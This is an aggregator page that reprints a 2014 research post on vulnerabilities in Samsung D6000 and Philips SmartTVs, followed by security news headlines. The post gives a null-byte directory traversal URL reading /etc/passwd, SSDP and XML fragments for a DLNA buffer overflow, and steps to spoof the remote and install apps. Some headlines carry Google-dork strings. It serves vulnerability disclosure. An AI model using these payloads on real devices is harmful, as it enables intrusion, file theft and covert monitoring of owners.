1. Reverse Engineering


ArabicEnglishFrenchGermanGreekItalianJapaneseKoreanPersianPolishPortugueseRussianSpanishTurkishVietnamese
Anzeige

Reverse Engineering


Suchen

SmartTV Insecurity - details of vulnerabilities affecting Samsung D6000 series and Philips (2013 models) [27 May 2014]

Reverse Engineering vom 03.01.2019 um 15:23 Uhr | Quelle revuln.blogspot.com
This post is derived from the slides (page 35) of our presentation at PHDays IV in 2014:

The following are the referenced videos:

Attack Surface

  • As you might have guessed there are a lot of different ways to attack a SmartTV
  • To get a better understanding let’s take a look at a real world device
  • We will just focus on a subset of the device attack surface
  • To do that we take in consideration the following schema related to a Philips SmartTV
...

Attack Surface - WiFi


WiFi adapter of the TV acting as access-point listening for WiFi
connections.
The Miracast protocol is composed by out-of-band WiFi packets, protocols
and codecs.


A vulnerability in Miracast allows the attacker to access the TV from outside your house.


 ...

Attack Surface - LAN

  • Most of the SmartTV issues are related to services exposed via LAN:
  • UPNP
  • Video/Audio service (like DirectFB)
  • Various HTTP/HTTPS servers
  • Network remote controller
  • Media sharing
  • Status and information
  • First thing to try on your SmartTV is using NMAP:
  • You will see a number of different TCP and UDP ports open
  • Some of them awaiting for you to connect :]
  • If you try to send some junk data to these ports you might get some easy way to crash/reboot the TV, a starting point to investigate
  • The TV also scans the LAN, an attacker can passively exploit vulnerabilities


Real World Issues







Samsung #1 (1)

Date: 2012

Tested device: Samsung SmartTV D6000

Affected Service/Protocol: DMRND, an HTTP server listening on ports 52253 and 52396

Vulnerability: Directory Traversal, which allows to download any file available on the device except special files like those in /proc

Details: The server has a security check to allow people to download files having only whitelisted file extensions (jpg, png, ..). To bypass the check the attacker needs to append a NULL byte followed by the whitelisted extension:
  • http://SERVER:52235/../../etc/passwd%00.png




Samsung #1 (2)

  • Download all the filesystems from the remote TV
  • Download the filesystems related to all the connected USB devices






Samsung #1 (3)


  • TV controller configuration file, it contains the parameters used by the whitelisted remote controller
  • Configuration file used by the our PC program, we need only to copy the above parameters here
These fields are not part of the Ethernet packets, but are defined inside the protocol itself so it’s possible to spoof the IP, MAC address and hostname to allow an attacker in the network to impersonate the whitelisted TV controller





Samsung #1 (4)

  • Now we can control the TV when the victim is not watching
  • The attacker can install arbitrary malicious Apps on the TV using the “develop” account






Samsung #2 (1)

Date: 2012

Tested device: Samsung SmartTV D6000

Affected Service/Protocol: DLNA client

Vulnerability: Buffer overflow exploitable as soon as the device tries to download the icon image associated to a DLNA host






Samsung #2 (2)


NOTIFY * HTTP/1.1
Host: 239.255.255.250:1900
Location: http://192.168.0.3:56923/test.xml
NTS: ssdp:alive
Cache-Control: max-age=1800
Server: UPnP/1.0 DLNADOC/1.50 Platinum/0.6.8.0-bb
USN: uuid:00000000-0000-0000-0000-
000000000000::urn:schemas-upnp-org:device:MediaServer:1
NT: urn:schemas-upnp-org:device:MediaServer:1

Samsung #2 (3)


<iconList>
    <icon>
        <mimetype>image/png</mimetype>
        <width>48</width>
        <height>48</height>
        <depth>32</depth>
<url>/images/aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaa [...]

Samsung #3

Date: 2012

Tested device: Samsung SmartTV D6000

Vulnerability: Persistent Endless Loop

Details: The controller packet contains a string, which is used to identify the controller itself. A malformed string will trigger an endless loop. The only way to fix this issue is to access the device service mode before the reboot.


Philips Miracast (1)

  • Found in 2014
  • ALL the Philips TV 2013 models are affected
  • Silently exploitable probably from Summer 2013
  • No PIN
  • No authorization request
  • Hardcoded fixed password… Miracast” :)
  • Full access to the TV services just like in LAN
  • Exploiting of directory traversal in JointSpace
  • Abuse of the available services
  • Let’s check what we can do…

Philips Miracast (2)

  • Controlling the TV from remote 

Philips Miracast (3)

  • Sending audio and video to the TV… the TV is talking to you!


Philips Miracast (4)

  • Stealing configuration files and cookies via a directory traversal public from September 2013 but unfixed



Conclusion

  • SmartTV are insecure
  • SmartTV are a perfect target for “monitoring” a specific target: a person or even a company (TVs are everywhere)
  • Exploiting them usually requires to be in the LAN or some user interaction
  • Currently it’s difficult to have a vulnerability for owning many models of TV, so you must focus on the one of your target


Newsbewertung

Weiterlesen

Hacking Quest For Glory III

Reverse Engineering vom 03.01.2019 um 14:57 Uhr | Quelle reddit.com
submitted by /u/speckz
[link] [comments]
Newsbewertung

Weiterlesen

Pwnables (exploit-mes) for beginners

Reverse Engineering vom 03.01.2019 um 11:43 Uhr | Quelle reddit.com
submitted by /u/joxeankoret
[link] [comments]
Newsbewertung

Weiterlesen

dsym_obfuscate: Obfuscates dynamic symbol table

Reverse Engineering vom 03.01.2019 um 10:08 Uhr | Quelle reddit.com
submitted by /u/perror
[link] [comments]
Newsbewertung

Weiterlesen

dsym_obfuscate: Obfuscates dynamic symbol table

Reverse Engineering vom 03.01.2019 um 10:08 Uhr | Quelle reddit.com
submitted by /u/perror
[link] [comments]
Newsbewertung

Weiterlesen

Vuln: Adobe Acrobat and Reader CVE-2018-19725 Security Bypass Vulnerability

Exploits vom 03.01.2019 um 01:00 Uhr | Quelle securityfocus.com
Adobe Acrobat and Reader CVE-2018-19725 Security Bypass Vulnerability
Newsbewertung

Weiterlesen

Microsoft Windows 10: Schwachstelle ermöglicht Privilegieneskalation

Exploits vom 03.01.2019 um 01:00 Uhr | Quelle cert-bund.de
CB-K19/0005: Microsoft Windows 10: Schwachstelle ermöglicht Privilegieneskalation
Newsbewertung

Weiterlesen

Vuln: Schneider Electric Pro-face GP-Pro CVE-2018-7832 Arbitrary Code Execution Vulnerability

Exploits vom 03.01.2019 um 01:00 Uhr | Quelle securityfocus.com
Schneider Electric Pro-face GP-Pro CVE-2018-7832 Arbitrary Code Execution Vulnerability
Newsbewertung

Weiterlesen

Vuln: Adobe Acrobat and Reader CVE-2018-16011 Arbitrary Code Execution Vulnerability

Exploits vom 03.01.2019 um 01:00 Uhr | Quelle securityfocus.com
Adobe Acrobat and Reader CVE-2018-16011 Arbitrary Code Execution Vulnerability
Newsbewertung

Weiterlesen

CVE-2019-3701

Exploits vom 03.01.2019 um 01:00 Uhr | Quelle cvedetails.com
An issue was discovered in can_can_gw_rcv in net/can/gw.c in the Linux kernel through 4.19.13. The CAN frame modification rules allow bitwise logical operations that can be also applied to the can_dlc field. Because of a missing check, the CAN drivers may write arbitrary content beyond the data registers in the CAN controller's I/O memory when processing can-gw manipulated outgoing frames. This is related to cgw_csum_xor_rel. An unprivileged user can trigger a system crash (general protection fault). (CVSS:0.0) (Last Update:2019-01-03)
Newsbewertung

Weiterlesen

CVE-2019-5005

Exploits vom 03.01.2019 um 01:00 Uhr | Quelle cvedetails.com
An issue was discovered in Foxit Reader and PhantomPDF before 9.4 on Windows. They allowed Denial of Service (application crash) via image data, because two bytes are written to the end of the allocated memory without judging whether this will cause corruption. (CVSS:0.0) (Last Update:2019-01-03)
Newsbewertung

Weiterlesen

CVE-2019-3905

Exploits vom 03.01.2019 um 01:00 Uhr | Quelle cvedetails.com
Zoho ManageEngine ADSelfService Plus 5.x before build 5703 has SSRF. (CVSS:0.0) (Last Update:2019-01-03)
Newsbewertung

Weiterlesen

CVE-2019-3575

Exploits vom 03.01.2019 um 01:00 Uhr | Quelle cvedetails.com
Sqla_yaml_fixtures 0.9.1 allows local users to execute arbitrary python code via the fixture_text argument in sqla_yaml_fixtures.load. (CVSS:0.0) (Last Update:2019-01-03)
Newsbewertung

Weiterlesen

CVE-2019-5007

Exploits vom 03.01.2019 um 01:00 Uhr | Quelle cvedetails.com
An issue was discovered in Foxit Reader and PhantomPDF before 9.4 on Windows. It is an Out-of-Bounds Read Information Disclosure and crash due to a NULL pointer dereference when reading TIFF data during TIFF parsing. (CVSS:0.0) (Last Update:2019-01-03)
Newsbewertung

Weiterlesen

CVE-2019-5006

Exploits vom 03.01.2019 um 01:00 Uhr | Quelle cvedetails.com
An issue was discovered in Foxit Reader and PhantomPDF before 9.4 on Windows. It is a NULL pointer dereference during PDF parsing. (CVSS:0.0) (Last Update:2019-01-03)
Newsbewertung

Weiterlesen

Zurmo 2.3.4 Cross Site Scripting

PoC vom 03.01.2019 um 00:22 Uhr | Quelle packetstormsecurity.com
Zurmo version 2.3.4 suffers from multiple cross site scripting vulnerabilities.
Newsbewertung

Weiterlesen

Methodology for System Image Assessments

Reverse Engineering vom 02.01.2019 um 21:43 Uhr | Quelle reddit.com
submitted by /u/xVIoct
[link] [comments]
Newsbewertung

Weiterlesen

Analysis of Neutrino Bot Sample

Reverse Engineering vom 02.01.2019 um 17:51 Uhr | Quelle reddit.com
submitted by /u/peppermalware
[link] [comments]
Newsbewertung

Weiterlesen

Long-Range Familial Searching Forensics

Reverse Engineering vom 02.01.2019 um 16:29 Uhr | Quelle schneier.com
Good article on using long-range familial searching -- basically, DNA matching of distant relatives -- as a police forensics tool....
Newsbewertung

Weiterlesen

Vtiger CRM 7.1.0 Remote Code Execution

PoC vom 02.01.2019 um 16:20 Uhr | Quelle cxsecurity.com
Topic: Vtiger CRM 7.1.0 Remote Code Execution Risk: Medium Text:# Exploit Title: Vtiger CRM 7.1.0 - Remote Code Execution # Date: 2018-12-27 # Exploit Author: Özkan Mustafa Akkuş (AkkuS) ...
Newsbewertung

Weiterlesen

#0daytoday #Vtiger CRM 7.1.0 - Remote Code Execution Exploit [webapps #exploits #0day #Exploit]

PoC vom 02.01.2019 um 15:15 Uhr | Quelle 0day.today

Newsbewertung

Weiterlesen

#0daytoday #WordPress Adicon Server 1.2 Plugin - selectedPlace SQL Injection Vulnerability [#0day #Exploit]

PoC vom 02.01.2019 um 15:15 Uhr | Quelle 0day.today

Newsbewertung

Weiterlesen

Gusto - Recipes Management v1.5.1 System sqli Vulnerability

Exploits vom 02.01.2019 um 13:20 Uhr | Quelle cxsecurity.com
inurl:"recipes/search?category_id=1&title=wajidareeb"
Newsbewertung

Weiterlesen

Gusto - Recipes Management v1.5.1 System SQL Injection Vulnerability

Exploits vom 02.01.2019 um 13:19 Uhr | Quelle cxsecurity.com
/profile/1-gusto
Newsbewertung

Weiterlesen

applepie: A hypervisor for Bochs and for fuzzing

Reverse Engineering vom 02.01.2019 um 11:55 Uhr | Quelle reddit.com
submitted by /u/gamozolabs
[link] [comments]
Newsbewertung

Weiterlesen

Gusto - Recipes Management v1.5.1 System Backdoor Account Vulnerability

Exploits vom 02.01.2019 um 07:44 Uhr | Quelle cxsecurity.com
/profile/1-gusto
Newsbewertung

Weiterlesen

Gusto - Recipes Management v1.5.1 System Backdoor Account Vulnerability

Exploits vom 02.01.2019 um 07:44 Uhr | Quelle cxsecurity.com
/profile/1-gusto
Newsbewertung

Weiterlesen

JustBoil.me Images Upload Vulnerability

Exploits vom 02.01.2019 um 07:44 Uhr | Quelle cxsecurity.com
/assets/tiny_mce/plugins/jbimages/dialog-v4.htm /
Newsbewertung

Weiterlesen

JustBoil.me Images Upload Vulnerability

Exploits vom 02.01.2019 um 07:44 Uhr | Quelle cxsecurity.com
/assets/tiny_mce/plugins/jbimages/dialog-v4.htm /
Newsbewertung

Weiterlesen

Logo & Web Design by LogoBee XSS Vulnerability

Exploits vom 02.01.2019 um 07:44 Uhr | Quelle cxsecurity.com
intext:''Logo & Web Design by LogoBee'
Newsbewertung

Weiterlesen

Logo & Web Design by LogoBee XSS Vulnerability

Exploits vom 02.01.2019 um 07:44 Uhr | Quelle cxsecurity.com
intext:''Logo & Web Design by LogoBee'
Newsbewertung

Weiterlesen

PHP Kernel Writeup with Instructions (Reversing)

Reverse Engineering vom 02.01.2019 um 07:22 Uhr | Quelle reddit.com
submitted by /u/binaryswap
[link] [comments]
Newsbewertung

Weiterlesen

ImpressCMS 1.3.10 Cross Site Scripting

PoC vom 02.01.2019 um 06:22 Uhr | Quelle packetstormsecurity.com
ImpressCMS version 1.3.10 suffers from multiple cross site scripting vulnerabilities.
Newsbewertung

Weiterlesen

EZ CD Audio Converter 8.0.7 Denial Of Service

PoC vom 02.01.2019 um 05:02 Uhr | Quelle packetstormsecurity.com
EZ CD Audio Converter version 8.0.7 suffers from a denial of service vulnerability.
Newsbewertung

Weiterlesen

WordPress Adicon Server 1.2 SQL Injection

PoC vom 02.01.2019 um 04:44 Uhr | Quelle packetstormsecurity.com
WordPress Adicon Server version 1.2 suffers from a remote SQL injection vulnerability.
Newsbewertung

Weiterlesen

Seitennavigation

Seite 2 von 2.407 Seiten (Bei Beitrag 35 - 70)
84.213x Beiträge in dieser Kategorie

Auf Seite 1 zurück | Nächste 3 Seite | Letzte Seite
[ 1 ] [2] [ 3 ] [ 4 ] [ 5 ] [ 6 ] [ 7 ] [ 8 ] [ 9 ] [ 10 ] [ 11 ] [ 12 ]